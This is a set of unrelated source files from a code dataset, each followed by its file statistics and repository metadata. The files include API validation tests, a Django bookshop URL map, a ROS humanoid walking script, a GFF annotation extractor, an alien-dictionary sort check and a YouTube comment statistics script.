'work_id': 'work123',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_work_id_and_end(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_start_without_end(client):
params = {
'what': 'syslog',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_end_without_start(client):
params = {
'what': 'syslog',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_start(client):
params = {
'what': 'syslog',
'start': 'notaninteger',
'end': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_invalid_end(client):
params = {
'what': 'syslog',
'end': 'notaninteger',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_start_after_end(client):
params = {
'what': 'syslog',
'end': 100,
'start': 200,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_cursor(client):
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': 'foobar',
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
def test_bad_cursor_valid_json(client):
cursor = base64.b64encode('{"valid": "json", "invalid": "cursor"}')
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': cursor,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
| 24.875
| 79
| 0.617204
| 413
| 3,383
| 4.893462
| 0.300242
| 0.106878
| 0.083622
| 0.122217
| 0.516576
| 0.443345
| 0.374072
| 0.339436
| 0.30381
| 0.30381
| 0
| 0.024638
| 0.244162
| 3,383
| 135
| 80
| 25.059259
| 0.765741
| 0.164056
| 0
| 0.494737
| 0
| 0
| 0.185501
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.136842
| false
| 0
| 0.021053
| 0
| 0.168421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e69ba962e4d092d4863d5beb5b0972723e70fc5
| 936
|
py
|
Python
|
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('signup', views.signup, name="signup"),
path('activate/<uidb64>/<token>/', views.activate_account, name='activate'),
path('sell-book', views.sell_book, name='sell_book'),
path('book/<int:id>/detail', views.book_detail, name='book_detail'),
path('add-balance', views.add_balance, name='add_balance'),
path('books-for-sale', views.books_for_sale, name='books_for_sale'),
path('purchased-books', views.purchased_books, name='purchased_books'),
path('profile/<str:username>', views.profile, name='profile'),
path('cart-items', views.cart_items, name='cart_items'),
path('add-items-to-cart/<int:book_item>', views.add_items_to_cart, name="add_items_to_cart"),
path('cancel-items', views.cancel_items, name="cancel_items"),
path('checkout', views.checkout, name='checkout')
]
| 52
| 97
| 0.698718
| 130
| 936
| 4.846154
| 0.269231
| 0.038095
| 0.057143
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002404
| 0.111111
| 936
| 18
| 98
| 52
| 0.754808
| 0
| 0
| 0
| 0
| 0
| 0.339381
| 0.086446
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.117647
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6d433ebfb2152c9c032a7b2793db23253d6dbb
| 10,464
|
py
|
Python
|
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | 1
|
2020-09-09T15:02:31.000Z
|
2020-09-09T15:02:31.000Z
|
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | null | null | null |
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from LIPM_with_dsupport import *
import random
import subprocess
from mono_define import *
from nav_msgs.msg import Odometry
from std_srvs.srv import Empty
def walk_test(initiate_time, T_dbl, zc, foot_height):
rospy.init_node('mono_move')
print('function called')
l_2.pub = rospy.Publisher('/mono/l_hip_roll_position/command', Float64, queue_size=1)
l_3.pub = rospy.Publisher('/mono/l_hip_pitch_position/command', Float64, queue_size=1)
l_4.pub = rospy.Publisher('/mono/l_knee_pitch_position/command', Float64, queue_size=1)
l_5.pub = rospy.Publisher('/mono/l_ankle_pitch_position/command', Float64, queue_size=1)
l_6.pub = rospy.Publisher('/mono/l_ankle_roll_position/command', Float64, queue_size=1)
r_2.pub = rospy.Publisher('/mono/r_hip_roll_position/command', Float64, queue_size=1)
r_3.pub = rospy.Publisher('/mono/r_hip_pitch_position/command', Float64, queue_size=1)
r_4.pub = rospy.Publisher('/mono/r_knee_pitch_position/command', Float64, queue_size=1)
r_5.pub = rospy.Publisher('/mono/r_ankle_pitch_position/command', Float64, queue_size=1)
r_6.pub = rospy.Publisher('/mono/r_ankle_roll_position/command', Float64, queue_size=1)
# reset_simulation = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
fall = False
def callback(data):
nonlocal fall
height = data.pose.pose.position.z
if height < 0.5:
fall = True
else:
fall = False
# print(fall,height)
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
def initiate_robot():
nonlocal fall
initiate_time = 5
speed = 0.01
angles_l = [0, 0, pi / 2, 0, 0, 0, 0]
angles_r = [0, 0, pi / 2, 0, 0, 0, 0]
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
s = subprocess.check_call("rosservice call /gazebo/reset_simulation \"{}\"", shell=True)
rospy.sleep(0.1)
body.ros_publish()
s = subprocess.check_call("rosservice call /gazebo/reset_simulation \"{}\"", shell=True)
rospy.sleep(0.4)
r = subprocess.check_call("rosservice call gazebo/unpause_physics", shell=True)
rospy.sleep(0.4)
# reset_simulation()
return pose_robot()
def pose_robot():
nonlocal fall
t = 0
initiate_time = 5
speed = 0.01
rate = rospy.Rate(1 / speed)
initial_height = 0.70
body.CoM = array([[0.015 - 0.09, 0, initial_height]])
spline_1, spline_2, spline_3 = body.transition_angle([pi / 2, 0, 0],
body.inverse_kinematics([0.09, 0, 0], "Left")[2:],
initiate_time)
while t <= initiate_time:
angles_l = [0, 0, spline_1(t), spline_2(t), spline_3(t), pi / 2]
angles_r = [0, 0, spline_1(t), spline_2(t), spline_3(t), pi / 2]
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
if t >= 3 and fall:
print('-------------robot has fallen--------')
return False
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
body.ros_publish()
t += speed
rate.sleep()
return True
for i in range(3):
if initiate_robot():
break
else:
continue
t = 0
# foot_height = 0.05
step_size = .1
iteration = 0
switch_timer = 0
left_l = True
foot_origin_ds = 0.09
initial_height = 0.70
foot_last_pos = [0, 0]
body.CoM = array([[0.015 - 0.09, 0, initial_height]])
# these are the best results initiate_time = 0.65 T_dbl = 0.1 zc = 0.6
# initiate_time = 0.63
# T_dbl = 0.08
# speed = 0.01
# zc = 0.6
speed = 0.01
try:
print(initiate_time, T_dbl, zc, foot_height)
xsolve, vxsolve, ysolve, vysolve, p_mod = LIPM(speed, initiate_time, T_dbl, zc)
body.time_step = speed
rate = rospy.Rate(1 / speed)
print("---------------started walking------------------------------------------")
while not rospy.is_shutdown():
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
if fall == True:
odom_sub.unregister()
l_2.pub.unregister()
l_3.pub.unregister()
l_4.pub.unregister()
l_5.pub.unregister()
l_6.pub.unregister()
r_2.pub.unregister()
r_3.pub.unregister()
r_4.pub.unregister()
r_5.pub.unregister()
r_6.pub.unregister()
return iteration
if iteration >= len(ysolve) - 20:
break
body.CoM = array([[ysolve[iteration] - 0.09, -xsolve[iteration], initial_height]])
if abs(round(switch_timer, 3)) == 0:
if t == 0:
step_multi = 0 # first step takes only 1 step size but the second step covers twice the d/s
second_step = True
else:
step_multi = 2
if second_step == True and t != 0:
second_step = False
step_multi = 1
if left_l:
spline_h_l = CubicSpline([0, initiate_time / 2, initiate_time], [0, foot_height, 0],
bc_type=(((1, 0)), (1, 0)))
spline_y_l = CubicSpline([0, initiate_time],
[body.links_l[6].end[0, 1],
-step_multi * step_size + body.links_l[6].end[0, 1]],
bc_type=(((1, 0)), (1, 0)))
swing_leg = 'Left'
switch_timer = initiate_time + T_dbl
ds_timer = T_dbl
dbl_phase = False
foot_last_pos[0] = r_6.end[0, 0]
foot_last_pos[1] = r_6.end[0, 1]
angles_r = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Right')
angles_l = body.inverse_kinematics([foot_origin_ds, spline_y_l(0), spline_h_l(0)], 'Left')
# k = speed
if not left_l:
spline_h_r = CubicSpline([0, initiate_time / 2, initiate_time], [0, foot_height, 0],
bc_type=((1, 0), (1, 0)))
spline_y_r = CubicSpline([0, initiate_time],
[body.links_r[6].end[0, 1],
-step_multi * step_size + body.links_r[6].end[0, 1]],
bc_type=((1, 0), (1, 0)))
swing_leg = 'Right'
switch_timer = initiate_time + T_dbl
ds_timer = T_dbl
dbl_phase = False
# k = speed
foot_last_pos[0] = l_6.end[0, 0]
foot_last_pos[1] = l_6.end[0, 1]
angles_l = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Left')
angles_r = body.inverse_kinematics([-foot_origin_ds, spline_y_r(0), spline_h_r(0)], 'Right')
# print(foot_last_pos)
left_l = not left_l
elif abs(round(switch_timer, 4)) > 0:
switch_timer -= speed
if swing_leg == 'Left':
k = initiate_time + T_dbl - switch_timer
# k +=speed
if round(k, 2) == initiate_time:
dbl_phase = True
if dbl_phase == True:
k = initiate_time
if abs(round(switch_timer, 4)) == 0:
switch_timer = 0
t += speed
continue
angles_l = body.inverse_kinematics([foot_origin_ds, spline_y_l(k), spline_h_l(k)], 'Left')
angles_r = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Right')
# print("this is in main", end=" ")
# print(rad2deg(angles_l))
elif swing_leg == 'Right':
k = initiate_time + T_dbl - switch_timer
# k+=speed
if round(k, 2) == initiate_time:
dbl_phase = True
if dbl_phase == True:
k = initiate_time
if abs(round(switch_timer, 4)) == 0:
switch_timer = 0
t += speed
continue
angles_r = body.inverse_kinematics([-foot_origin_ds, spline_y_r(k), spline_h_r(k)], 'Right')
angles_l = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Left')
# print("this is in main after hit", end=" ")
# print(rad2deg(angles_l))
if np.isnan(np.sum(angles_r)) or np.isnan(np.sum(angles_l)):
print("----------------NaN----------------------------")
return 0
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
body.ros_publish()
iteration += 1
rate.sleep()
except:
odom_sub.unregister()
l_2.pub.unregister()
l_3.pub.unregister()
l_4.pub.unregister()
l_5.pub.unregister()
l_6.pub.unregister()
r_2.pub.unregister()
r_3.pub.unregister()
r_4.pub.unregister()
r_5.pub.unregister()
r_6.pub.unregister()
print('-----------------walk_error-------------------')
return 0
i = 0
# while True:
# # initiate_time = random.choice([x / 100 for x in range(40, 71)])
# # T_dbl = random.choice([0.09, 0.1])
# # zc = random.choice([x / 100 for x in range(40, 71)])
# # i+=1
# # print(i)
# print(walk_test(0.48, 0.08, 0.41,0.05))
# # print(walk_test(initiate_time,T_dbl, zc))
# #
| 39.338346
| 112
| 0.503727
| 1,309
| 10,464
| 3.779985
| 0.148205
| 0.060631
| 0.031124
| 0.042441
| 0.670372
| 0.617219
| 0.551132
| 0.526475
| 0.425627
| 0.425627
| 0
| 0.046747
| 0.36831
| 10,464
| 265
| 113
| 39.486792
| 0.701815
| 0.079606
| 0
| 0.517588
| 0
| 0
| 0.084324
| 0.060454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020101
| false
| 0
| 0.030151
| 0
| 0.080402
| 0.030151
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6ee084797d0ef64a6ff35e8d531e000c40a386
| 781
|
py
|
Python
|
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
from BCBio import GFF
from Bio import SeqIO
import csv
import sys
in_gff_file = sys.argv[1]
out_file = sys.argv[2]
#Add annotations to sequences
print("Parsing .gff file...")
in_handle = open(in_gff_file)
limit_info = dict(gff_type = ["mRNA"])
protnames = []
protanno = []
for rec in GFF.parse(in_handle, limit_info = limit_info, target_lines = 1):
feat = rec.features[0]
protnames.append(feat.qualifiers["Name"][0])
protanno.append(feat.qualifiers["Note"][0])
in_handle.close()
#Write lists of sequences and annotations to .tsv file
print("Writing annotations to %s ..." % out_file)
with open(out_file, "w") as f:
for protname, protan in zip(protnames, protanno):
entry = [protname, protan]
f.write("\t".join(entry) + "\n")
f.close()
print("Extraction complete.")
| 23.666667
| 75
| 0.713188
| 122
| 781
| 4.442623
| 0.508197
| 0.027675
| 0.03321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008915
| 0.138284
| 781
| 32
| 76
| 24.40625
| 0.796434
| 0.103713
| 0
| 0
| 0
| 0
| 0.123386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.173913
| 0
| 0.173913
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6ee92ffbfcbd13c35e3bca05e4f1adb80adce8
| 1,657
|
py
|
Python
|
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
"""
In an alien language, surprisingly they also use english lowercase letters, but possibly in a different order. The order of the alphabet is some permutation of lowercase letters.
Given a sequence of words written in the alien language, and the order of the alphabet, return true if and only if the given words are sorted lexicographicaly in this alien language.
Example 1:
Input: words = ["hello","luther"], order = "hlabcdefgijkmnopqrstuvwxyz"
Output: true
Explanation: As 'h' comes before 'l' in this language, then the sequence is sorted.
"""
class Solution:
def isAlienSorted(self, words, order):
order_map={}
for index, value in enumerate(order):
#order map is created. with letter as index and position as value.
order_map[value] = index
for i in range(0, len(words)-1, 1):
for j in range(0, len(words[i])):
# first word is similar to second word. but first word is longer. like apple, app
if j >= len(words[i+1]):
return False
if words[i][j] != words[i+1][j]:
if order_map[words[i][j]] > order_map[words[i+1][j]]:
return False
break
return True
words1=["hello","luther"]
order1="hlabcdefgijkmnopqrstuvwxyz"
print(Solution().isAlienSorted(words1, order1))
words2=["word","world","row"]
order2="worldabcefghijkmnpqstuvxyz"
print(Solution().isAlienSorted(words2, order2))
words2=["apple","app"]
order2="abcdefghijklmnopqrstuvwxyz"
print(Solution().isAlienSorted(words2, order2))
| 35.255319
| 182
| 0.631261
| 211
| 1,657
| 4.938389
| 0.417062
| 0.034549
| 0.020154
| 0.024952
| 0.143954
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016461
| 0.266747
| 1,657
| 47
| 183
| 35.255319
| 0.841152
| 0.418226
| 0
| 0.173913
| 0
| 0
| 0.114017
| 0.08159
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0
| 0
| 0.217391
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e714ffa033577119fdde50aec9e7885109ed239
| 3,524
|
py
|
Python
|
osna/tmp/stats_Youtube.py
|
tapilab/elevate-osna-news
|
bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
|
[
"MIT"
] | 2
|
2019-08-14T08:17:33.000Z
|
2019-11-13T18:03:11.000Z
|
osna/tmp/stats_Youtube.py
|
tapilab/elevate-osna-news
|
bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
|
[
"MIT"
] | null | null | null |
osna/tmp/stats_Youtube.py
|
tapilab/elevate-osna-news
|
bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
|
[
"MIT"
] | 2
|
2020-05-26T05:11:15.000Z
|
2021-10-08T08:01:21.000Z
|
import pandas as pd
from collections import Counter
import re
def Mystats(directory):
df=pd.read_csv(directory)
id=df['social_id'].unique()
#1
print('Q1:Number of unique users:',len(id))
mes=df['comment_tokens']
#2
print('Q2:Number of unique messages:',len(mes.unique()))
#4
word=[]
for m in mes.astype(str):
mes=m.split()
for mes1 in mes:
mes1=re.sub("[0-9\W+]","",mes1)
# print(mes1)
if(mes1!=""):
word.append(mes1)
word1=list(set(word))
print('Q4:Number of unique words:',len(word1))
#5
print('Q5:Number of tokens:', len(mes))
#6
c=Counter(word)
print('Q6:50 most common words:',c.most_common(50))
word1 = []
df1=pd.read_csv('D:\\news\\training_data\\factchecks.csv')
true=df1[(df1.site=='youtube')&(df1.ruling=='TRUE')]
msgtrue=true['social_id']
print('Q3:Number of users/message in class TRUE:', len(msgtrue))
pd1=pd.merge(df,true,on=['social_id','site'],how='inner')
word1=tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
false = df1[(df1.site == 'youtube') & (df1.ruling == 'FALSE')]
msgfalse = false['social_id']
print('Q3:Number of users/message in class FALSE:', len(msgfalse))
pd1 = pd.merge(df, false, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
fire= df1[(df1.site == 'youtube') & (df1.ruling == 'Pants on Fire!')]
msgfire = fire['social_id']
print('Number of users/message in class Pants on Fire:', len(msgfire))
pd1 = pd.merge(df, fire, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
mt = df1[(df1.site == 'youtube') & (df1.ruling == 'Mostly True')]
msgmt = mt['social_id']
print('Number of users/message in class Mostly True:', len(msgmt))
pd1 = pd.merge(df, mt, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
mf = df1[(df1.site == 'youtube') & (df1.ruling == 'Mostly False')]
msgmf = mf['social_id']
print('Number of users/message in class Mostly False:', len(msgmf))
pd1 = pd.merge(df, mf, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
ht = df1[(df1.site == 'youtube') & (df1.ruling == 'Half-True')]
msgfire = ht['social_id']
print('Number of users/message in class Half-True:', len(ht))
pd1 = pd.merge(df, ht, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
mx = df1[(df1.site == 'youtube') & (df1.ruling == 'MIXTURE')]
msgfire = mx['social_id']
print('Number of users/message in class MIXTURE:', len(mx))
pd1 = pd.merge(df, mx, on=['social_id', 'site'], how='inner')
word1 = tweet_tokenizer(pd1)
print('Q7:50 most common words:', Counter(word1).most_common(50))
def tweet_tokenizer(df):
list=[]
msg = df['comment_tokens']
for m in msg.astype(str):
mes = m.split()
for mes1 in mes:
mes1 = re.sub("[0-9\W+]", "", mes1)
if (mes1!= ""):
list.append(mes1)
print(list)
return list
if __name__=='__main__':
Mystats(directory)
| 34.54902
| 74
| 0.607832
| 511
| 3,524
| 4.105675
| 0.191781
| 0.076263
| 0.045758
| 0.064824
| 0.584366
| 0.584366
| 0.522402
| 0.491897
| 0.491897
| 0.4347
| 0
| 0.042576
| 0.206867
| 3,524
| 101
| 75
| 34.891089
| 0.70805
| 0.004824
| 0
| 0.282051
| 0
| 0
| 0.285061
| 0.01114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.038462
| 0
| 0.076923
| 0.25641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|